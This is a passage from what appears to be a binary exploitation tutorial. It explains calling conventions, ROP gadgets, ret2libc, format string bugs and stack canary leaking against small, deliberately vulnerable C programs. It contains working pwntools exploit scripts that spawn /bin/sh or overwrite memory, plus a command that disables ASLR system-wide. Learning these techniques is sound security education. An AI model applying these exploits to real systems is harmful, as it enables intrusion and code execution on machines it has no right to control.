│ │ 0x08049188 e8a3feffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x0804918d 83c410 add esp, 0x10
│ ┌──< 0x08049190 eb14 jmp 0x80491a6
│ │└─> 0x08049192 83ec0c sub esp, 0xc
│ │ 0x08049195 8d900ee0ffff lea edx, [eax - 0x1ff2]
│ │ 0x0804919b 52 push edx
│ │ 0x0804919c 89c3 mov ebx, eax
│ │ 0x0804919e e88dfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x080491a3 83c410 add esp, 0x10
│ │ ; CODE XREF from sym.vuln @ 0x8049190
│ └──> 0x080491a6 90 nop
│ 0x080491a7 8b5dfc mov ebx, dword [var_4h]
│ 0x080491aa c9 leave
└ 0x080491ab c3 ret
Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables and arguments - as you can see at the top, there is an argument called arg_8h. Later this same one is compared to 0xdeadbeef:
cmp dword [arg_8h], 0xdeadbeef
Clearly, that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like this:
return address param_1
Analyzing 64-bit
Let's disassemble the main
again here.
0x00401153 55 push rbp
0x00401154 4889e5 mov rbp, rsp
0x00401157 bfefbeadde mov edi, 0xdeadbeef
0x0040115c e8c1ffffff call sym.vuln
0x00401161 bfdec0adde mov edi, 0xdeadc0de
0x00401166 e8b7ffffff call sym.vuln
0x0040116b b800000000 mov eax, 0
0x00401170 5d pop rbp
0x00401171 c3 ret
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi
(in the disassembly here it's edi
, but edi
is just the lower 32 bits of rdi
, and the parameter is only 32 bits long, so it says EDI
instead). If we break on sym.vuln
again we can check rdi
with the command
dr rdi
Just
dr
will display all registers
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address
Multiple Parameters
Source
#include <stdio.h>
void vuln(int check, int check2, int check3) {
if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
32-bit
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
0x080491dd 680dd0dec0 push 0xc0ded00d
0x080491e2 68dec0adde push 0xdeadc0de
0x080491e7 68efbeadde push 0xdeadbeef
0x080491ec e871ffffff call sym.vuln
[...]
0x080491f7 6810efcdab push 0xabcdef10
0x080491fc 6878563412 push 0x12345678
0x08049201 68dec0adde push 0xdeadc0de
0x08049206 e857ffffff call sym.vuln
It's just as simple - push
them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln
and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
return pointer param1 param2 param3 [...] paramN
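The push order can be modelled in a few lines. This is a toy model of a 32-bit call, not a disassembler: call_32bit is a hypothetical helper that returns the stack as the callee sees it on entry, with index 0 being the top of the stack.

```python
def call_32bit(return_addr: int, args: list) -> list:
    """Model the stack (top first) at the first instruction of the callee."""
    stack = []                    # index 0 is the top of the stack (lowest address)
    for arg in reversed(args):    # arguments are pushed last-to-first
        stack.insert(0, arg)
    stack.insert(0, return_addr)  # `call` pushes the return address last
    return stack

stack = call_32bit(0x080491f1, [0xdeadbeef, 0xdeadc0de, 0xc0ded00d])
print([hex(word) for word in stack])
# ['0x80491f1', '0xdeadbeef', '0xdeadc0de', '0xc0ded00d']
```

The output lines up with the pxw @ esp dump above: pushing in reverse means the first parameter ends up closest to the return pointer.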
64-bit
0x00401170 ba0dd0dec0 mov edx, 0xc0ded00d
0x00401175 bedec0adde mov esi, 0xdeadc0de
0x0040117a bfefbeadde mov edi, 0xdeadbeef
0x0040117f e89effffff call sym.vuln
0x00401184 ba10efcdab mov edx, 0xabcdef10
0x00401189 be78563412 mov esi, 0x12345678
0x0040118e bfdec0adde mov edi, 0xdeadc0de
0x00401193 e88affffff call sym.vuln
So as well as rdi, we also load values into rsi and rdx (or, in this case, their lower 32 bits). Nothing is pushed to the stack for these parameters.
Bigger 64-bit values
Just to show that it is in fact ultimately rdi
and not edi
that is used, I will alter the original one-parameter code to utilize a bigger number:
#include <stdio.h>
void vuln(long check) {
if(check == 0xdeadbeefc0ded00d) {
puts("Nice!");
}
}
int main() {
vuln(0xdeadbeefc0ded00d);
}
If you disassemble the main
, you can see it disassembles to
movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln
movabs is how the disassembler spells a mov that carries a full 64-bit immediate - treat it as if it's a mov.
Gadgets
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret
instruction, e.g. pop rdi; ret
. We can manipulate the ret
of these gadgets in such a way as to string together a large chain of them to do what we want.
Example
Let's for a minute pretend that, during the execution of a pop rdi; ret gadget, rsp points at 0x10 at the top of the stack and the next value on the stack is 0x5655576724.
What happens is fairly obvious - 0x10
gets popped into rdi
as it is at the top of the stack during the pop rdi
. Once the pop
occurs, rsp
moves:
And since ret
is equivalent to pop rip
, 0x5655576724
gets moved into rip
. Note how the stack is laid out for this.
Utilizing Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, rsp points to the next value on the stack - but wait. We can overwrite the next value on the stack too.
Let's say that we want to exploit a binary to jump to a pop rdi; ret
gadget, pop 0x100
into rdi
then jump to flag()
. Let's step-by-step the execution.
On the original ret
, which we overwrite the return pointer for, we pop the gadget address in. Now rip
moves to point to the gadget, and rsp
moves to the next memory address.
rsp
moves to the 0x100
; rip
to the pop rdi
. Now when we pop, 0x100
gets moved into rdi
.
RSP moves to the next item on the stack, the address of the flag()
. The ret
is executed and flag()
is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values afterward (including the value for the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would be, after the padding: the address of the pop rdi; ret gadget, then 0x10, then 0x16.
Note if you have multiple pop
instructions, you can just add more values.
We use
rdi
as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
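The walk-through above can be checked with a toy model of the CPU that understands only pop and ret. Everything here is illustrative: the gadget address is hypothetical, run_chain is not a real tool, and the chain is the list of 8-byte words that would follow the padding.

```python
import struct

POP_RDI_RET = 0x4011db  # hypothetical address of a `pop rdi; ret` gadget
GADGETS = {POP_RDI_RET: [("pop", "rdi"), ("ret",)]}

def run_chain(chain, gadgets=GADGETS):
    """Consume words from the stack the way ret and pop would, and report the final registers."""
    stack = list(chain)
    regs = {"rdi": None, "rip": stack.pop(0)}  # the vulnerable function's own ret
    while regs["rip"] in gadgets:
        for op in gadgets[regs["rip"]]:
            if op[0] == "pop":
                regs[op[1]] = stack.pop(0)     # pop <reg>: take the next word
            else:
                regs["rip"] = stack.pop(0)     # ret: the next word becomes rip
    return regs

chain = [POP_RDI_RET, 0x10, 0x16]
regs = run_chain(chain)
payload = b"".join(struct.pack("<Q", word) for word in chain)

print(hex(regs["rdi"]), hex(regs["rip"]))  # 0x10 0x16
print(len(payload))                        # 24
```

Each pop or ret consumes exactly one 8-byte word, which is why the values are placed in the payload in the order the instructions will use them.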
Finding Gadgets
We can use the tool ROPgadget
to find possible gadgets.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
Combine it with grep
to look for specific registers.
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
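For intuition about what a gadget finder looks for, pop rdi; ret is just the two bytes 5f c3, so a naive search over raw code bytes already finds candidates. This is only a sketch: real tools such as ROPgadget do far more than a byte search, and both find_gadget and the sample bytes below are made up for illustration.

```python
POP_RDI_RET = b"\x5f\xc3"  # machine code for `pop rdi; ret` on x86-64

def find_gadget(code: bytes, gadget: bytes, base: int = 0) -> list:
    """Return every address (base + offset) at which the gadget bytes occur."""
    hits = []
    start = code.find(gadget)
    while start != -1:
        hits.append(base + start)
        start = code.find(gadget, start + 1)
    return hits

# Hypothetical code bytes: `pop rsi; pop r15; ret` loaded at a made-up address.
sample = b"\x5e\x41\x5f\xc3"
hits = find_gadget(sample, POP_RDI_RET, base=0x4011f9)
print([hex(addr) for addr in hits])  # ['0x4011fb']
```

Note that the hit lands in the middle of pop r15 (41 5f): jumping one byte into an instruction yields a different, perfectly valid instruction, which is where many useful gadgets come from.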
Exploiting Calling Conventions
Utilizing Calling Conventions
32-bit
The program expects the stack to be laid out like this before executing the function: the return address at the top, followed by the parameters in order (param_1, param_2, and so on).
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
64-bit
Same logic, except we have to utilize the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> second param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0) # Return address - don't care if it crashes when done
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
ret2libc
The standard ROP exploit
A ret2libc is based on the system function found within the C library. This function executes whatever command string is passed to it, making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?
Disabling ASLR
To start with, we are going to disable ASLR. ASLR randomizes the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Manual Exploitation
Getting Libc and its base
Fortunately, Linux has a command called ldd which lists a program's dynamically linked libraries. If we run it on our compiled ELF file, it'll tell us the libraries it uses and the addresses they are loaded at.
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
We need libc.so.6
, so the base address of libc is 0xf7dc2000
.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
Getting the location of system()
To call system, we obviously need its location in memory. We can use the readelf command for this.
$ readelf -s /lib32/libc.so.6 | grep system
1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
The -s flag tells readelf to print the symbol table, which includes functions. Here we can see that the offset of system from the libc base is 0x44f00.
Getting the location of /bin/sh
Since /bin/sh
is just a string, we can use strings
on the dynamic library we just found with ldd
. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
-a
tells it to scan the entire file; -t x
tells it to output the offset in hex.
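Turning those offsets into absolute addresses is plain addition, sketched below with the example values from this page (yours will likely differ). The helper find_string_offset mimics the strings lookup on an in-memory blob; the blob is a stand-in and not a real libc.

```python
def resolve(libc_base: int, offset: int) -> int:
    """Absolute address = where libc is loaded + offset inside the libc file."""
    return libc_base + offset

def find_string_offset(blob: bytes, needle: bytes = b"/bin/sh\x00") -> int:
    """Offset of the first null-terminated match, or -1 if the string is absent."""
    return blob.find(needle)

libc_base = 0xf7dc2000                   # from ldd
system = resolve(libc_base, 0x44f00)     # from readelf -s
binsh = resolve(libc_base, 0x18c32b)     # from strings -a -t x
print(hex(system), hex(binsh))           # 0xf7e06f00 0xf7f4e32b

fake_libc = b"\x00" * 16 + b"/bin/sh\x00"  # stand-in bytes, not a real libc
fake_offset = find_string_offset(fake_libc)
print(fake_offset)                         # 16
```

These only hold while ASLR is disabled, since the base reported by ldd changes on every run otherwise.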
32-bit Exploit
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
64-bit Exploit
Repeat the process with the libc linked to the 64-bit binary (should be called something like /lib/x86_64-linux-gnu/libc.so.6).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret
gadget to put it into the RDI register.
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
Automating with Pwntools
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
Format String Bug
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifiers" within strings. Let's look at an example:
int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
This prints out:
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d
with the value, %f
with the float value and %x
with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try printing out the same value in hex 3 times:
int value = 1205;
printf("%x %x %x", value, value, value);
As expected, we get
4b5 4b5 4b5
What happens, however, if we don't have enough arguments for all the format specifiers?
int value = 1205;
printf("%x %x %x", value);
4b5 5659b000 565981b0
Erm... what happened here?
The key here is that printf
expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
How to abuse this
Surely if it's a bug in the code, the attacker can't do much, right? Well, the real issue is when C code takes user-provided input and prints it out using printf
.
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
If we run this normally, it works as expected:
$ ./test
yes
yes
But what happens if we input a format string specifier, such as %x
?
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
Choosing Offsets
To print the same value 3 times, using
printf("%x %x %x", value, value, value);
Gets tedious - so, there is a better way in C.
printf("%1$x %1$x %1$x", value);
The 1$
between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p
- instead of sending %p %p %p %p %p %p
, we can just do %6$p
. This allows us to be much more efficient.
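The difference between sequential and positional specifiers can be shown with a toy model of 32-bit printf, in which argument N is simply the Nth word on the stack after the format string pointer. The function leak is hypothetical, handles only %x and %p, and unlike glibc prints 0x0 rather than (nil) for a zero pointer.

```python
import re

def leak(fmt: str, stack_words: list) -> str:
    """Toy model: resolve each %x / %p / %N$x / %N$p against a list of stack words."""
    out = []
    next_arg = 0
    for match in re.finditer(r"%(?:(\d+)\$)?([xp])", fmt):
        if match.group(1):                 # positional form, e.g. %6$p
            index = int(match.group(1)) - 1
        else:                              # sequential form takes the next argument
            index = next_arg
            next_arg += 1
        word = stack_words[index]
        out.append(hex(word) if match.group(2) == "p" else format(word, "x"))
    return " ".join(out)

# Stack words taken from the example output earlier in this section
words = [0xf7f74080, 0x0, 0x5657b1c0, 0x782573fc, 0x20782520, 0x25207825]
print(leak("%x %x %x", words))  # f7f74080 0 5657b1c0
print(leak("%6$p", words))      # 0x25207825
```

A single positional specifier reaches the sixth word directly, which matters when the input buffer is too small to hold a long run of %p.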
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
You may notice that the last two values contain the hex values of %x. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address into the buffer and then point %s at it, we can get an arbitrary read!
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
%p prints a pointer; generally, it returns the same as %x but precedes it with a 0x, which makes it stand out more.
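A quick way to confirm that a leaked word is part of our own input is to turn it back into bytes, remembering that x86 is little-endian. A small sketch (word_to_bytes is just an illustrative name):

```python
import struct

def word_to_bytes(word: int) -> bytes:
    """Show a leaked 32-bit word as the bytes that actually sit in memory."""
    return struct.pack("<I", word)

print(word_to_bytes(0x44434241))  # b'ABCD'
print(word_to_bytes(0x20782520))  # b' %x '
print(word_to_bytes(0x25207825))  # b'%x %'
```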
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s
- if all goes well, it should read the first bytes of the file, which is always \x7fELF
. Start with the basics:
from pwn import *
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'
Nice it works. The base address of the binary is 0x8048000
, so let's replace the 0x41424344
with that and read it with %s
:
from pwn import *
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf
stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
from pwn import *
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
Let's break down the payload:
- We add 4 | because we want the address we write to fill one memory address, not half of one and half of another, because that would result in reading the wrong address
- The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p
with an s
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'
Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.
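The offset arithmetic from the payload breakdown can be written down as a small helper. This is a sketch under the assumptions used above (32-bit, buffer starting at the 6th argument, an 8-byte prefix); read_payload is a hypothetical function, not part of pwntools.

```python
import struct

WORD = 4  # bytes per stack slot on 32-bit

def read_payload(target: int, buffer_offset: int, spec: str = "s") -> bytes:
    """Specifier first, address last, so a null byte in the address cannot cut off the specifier."""
    prefix_len = 2 * WORD                         # reserve two whole stack slots for the specifier
    slot = buffer_offset + prefix_len // WORD     # the address lands this many slots along
    prefix = f"%{slot}${spec}".encode().ljust(prefix_len, b"|")
    if len(prefix) != prefix_len:
        raise ValueError("specifier does not fit in the reserved prefix")
    return prefix + struct.pack("<I", target)

payload = read_payload(0x8048000, buffer_offset=6)
print(payload)  # b'%8$s||||\x00\x80\x04\x08'
```

The padding with | keeps the address aligned to a stack slot, so %8$s picks up exactly those four bytes.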
Arbitrary Writes
Luckily C contains a rarely-used format specifier %n
. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000
to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth with the value 10. The format string vulnerability is obvious, and there's no buffer overflow because fgets limits the read to the size of the buffer.
Work out the location of auth
As it's a global variable, it's within the binary itself. We can check the location using readelf
to check for symbols.
$ readelf -s auth | grep auth
34: 00000000 0 FILE LOCAL DEFAULT ABS auth.c
57: 0804c028 4 OBJECT GLOBAL DEFAULT 24 auth
The location of auth
is 0x0804c028
.
Writing the Exploit
We're lucky there are no null bytes, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520
Buffer is the 7th %p
.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
And easy peasy:
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
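The counting that makes this work can be checked without running the binary. The sketch below rebuilds the same payload with the standard library and counts how many characters printf will have written when it reaches %n; n_write_payload is an illustrative helper and only handles small values where plain filler characters are enough.

```python
import struct

def n_write_payload(target: int, value: int, buffer_offset: int) -> bytes:
    """Address first, then filler so that exactly `value` bytes are printed before %n."""
    addr = struct.pack("<I", target)
    if b"\x00" in addr:
        raise ValueError("address contains a null byte; it would have to go after the specifier")
    if value < len(addr):
        raise ValueError("cannot write a value smaller than the address length this way")
    filler = b"|" * (value - len(addr))
    return addr + filler + f"%{buffer_offset}$n".encode()

payload = n_write_payload(0x804c028, 10, 7)
written_before_n = payload.index(b"%")  # bytes printed before %n is processed
print(payload)           # b'(\xc0\x04\x08||||||%7$n'
print(written_before_n)  # 10
```

Four address bytes plus six filler characters gives the 10 that ends up in auth.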
Pwntools
As you can expect, pwntools has a handy feature for automating %n
format string exploits:
payload = fmtstr_payload(offset, {location : value})
The offset
in this case is 7
because the 7th %p
read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
payload = fmtstr_payload(7, {AUTH : 10})
You can also grab the location of the auth
symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
Check out the pwntools tutorials for more cool features
Stack Canaries
The Buffer Overflow defense
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret
, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer, and the program crashes, often with a ***stack smashing detected***
error message.
On Linux, stack canaries end in 00
. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
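The check itself is easy to model. The following is a toy simulation rather than how the compiler implements it: the frame is a buffer followed directly by a 4-byte canary, the copy is unchecked like gets(), and make_canary and run_function are made-up names.

```python
import os

def make_canary(width: int = 4) -> bytes:
    """Random canary whose lowest byte is 00; little-endian, so the 00 comes first in memory."""
    return b"\x00" + os.urandom(width - 1)

def run_function(user_input: bytes, canary: bytes, buf_size: int = 64) -> str:
    frame = bytearray(buf_size) + canary   # buffer sits directly below the canary in this model
    frame[:len(user_input)] = user_input   # unchecked copy, like gets()
    if bytes(frame[buf_size:buf_size + len(canary)]) != canary:
        return "*** stack smashing detected ***"
    return "returned normally"

canary = make_canary()
print(run_function(b"A" * 64, canary))           # fits in the buffer: returned normally
print(run_function(b"A" * 68, canary))           # clobbers the canary: *** stack smashing detected ***
print(run_function(b"A" * 64 + canary, canary))  # canary rewritten with itself: returned normally
```

The third call is the idea behind leaking the canary: overflowing is harmless to the check as long as the canary bytes are replaced with their own value.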
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
Source
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. We can use the format string to leak the canary value, then use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check, as its value remains constant. And of course, we just have to run win().
32-bit
First, let's check if there is a canary:
$ pwn checksec vuln-32
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Yup, there is. Now we need to work out the offset of the canary; to do this we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. Counting the words in the dump, that value is roughly the 24th, so we try the offsets one before and one after as well to make sure.
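The eyeballing described above can be sketched as a small filter. This is only a heuristic under the assumptions stated in the text (a null low byte, and libc/stack addresses starting with f7/ff); `canary_candidates` is a hypothetical helper name, and a real canary could by chance look like an address.

```python
# Hypothetical helper: flag 32-bit stack words that look like a canary.
def canary_candidates(words):
    """Return (index, value) pairs whose low byte is 0x00 and which do not
    start with 0xf7 (libc-like) or 0xff (stack-like)."""
    hits = []
    for index, value in enumerate(words):
        low_byte_is_null = (value & 0xFF) == 0
        top_byte = value >> 24
        if value != 0 and low_byte_is_null and top_byte not in (0xF7, 0xFF):
            hits.append((index, value))
    return hits

# Words copied from the pxw dump above, in stack order.
dump = [
    0xFFD7CD7C, 0xFFD7CDEC, 0x00000002, 0x0804919E,
    0x08048034, 0x00000000, 0xF7F57000, 0x00007025,
    0x00000000, 0x00000000, 0x08048034, 0xF7F02A28,
    0xF7F01000, 0xF7F3E080, 0x00000000, 0xF7D53ADE,
    0xF7F013FC, 0xFFFFFFFF, 0x00000000, 0x080492CB,
    0x00000001, 0xFFD7CE84, 0xFFD7CE8C, 0xADC70E00,
]

for index, value in canary_candidates(dump):
    print(index, hex(value))
```

The index is 0-based from the first dumped word, so treat it as a starting point and confirm the exact format string offset by trying its neighbours, as the text does next.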
$ ./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p. Remember, stack canaries are randomized for each new process, so the value won't be the same between runs.
Now let's just automate grabbing the canary with pwntools:
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is to work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc. A little later on, the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
